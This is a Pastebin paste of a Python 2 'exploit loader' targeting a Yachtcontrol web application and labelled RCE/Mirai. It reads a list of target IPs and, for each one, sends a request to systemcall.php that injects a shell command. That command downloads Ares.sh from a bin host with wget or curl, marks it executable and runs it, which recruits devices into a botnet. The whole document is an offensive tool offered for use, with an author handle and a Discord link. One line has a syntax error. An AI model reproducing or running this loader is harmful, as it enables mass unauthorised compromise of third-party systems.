Advertisement
xB4ckdoorREAL

[YACHTCONTROL WEBAPP EXPLOIT LOADER] [RCE] [MIRAI]

Dec 12th, 2019
504
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.07 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # Yachtcontrol Webapplication EXPLOIT loader made by B4CKDOOR #
  4. # B4CKDOORARCHIVE.HOST - https://discord.gg/MVktpTW #
  5.  
  6. import threading, random, socket, time, sys, requests, re, os, subprocess
  7.  
  8. if len(sys.argv) < 3:
  9.     print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"
  10.     sys.exit()
  11.  
  12. ip = "1.3.3.7" # BINS LOCATION IP - PORTS 80 DEFAULT
  13. port = int(sys.argv[2]) # ports  80 8081 8083
  14. vulns = open(sys.argv[1], "r").readlines()
  15. class send_payload(threading.Thread):
  16.     def __init__ (self, ip):
  17.         threading.Thread.__init__(self)
  18.         self.ip = str(ip).rstrip('\n')
  19.     def run(self):
  20.         try:
  21.             url = "http://" + self.ip + ":"port"/pages/systemcall.php?command=|wget http://" + ip + "/Ares.sh; curl -O http://" + ip + "/Ares.sh; chmod +x Ares.sh; ./Ares.sh"
  22.             requests.get(url, timeout=3)
  23.             print "[Yatch-WAPP] Loading: %s"%(self.ip)
  24.         except:
  25.             pass
  26.  
  27. for IP in vulns:
  28.     try:
  29.         ip = "".join(IP)
  30.         ip = ip.replace("\n", "")
  31.         t = send_payload(ip)
  32.         t.start()
  33.         time.sleep(0.03)
  34.     except:
  35.         pass #CODED BY B4CKDOOR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement